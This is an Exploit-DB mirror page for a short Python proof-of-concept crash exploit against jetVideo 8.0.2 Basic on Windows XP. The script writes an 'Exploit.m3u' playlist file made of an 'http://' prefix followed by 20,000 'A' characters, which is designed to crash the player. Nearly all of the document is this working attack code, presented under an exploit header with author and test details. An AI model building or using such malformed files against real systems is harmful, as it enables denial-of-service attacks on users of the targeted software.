exploit-db-mirror/exploits/windows/dos/18481.py
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

17 lines
No EOL
365 B
Python
Executable file

# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]
header = "http://"
junk = "A" * 20000
payload = (header+junk)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()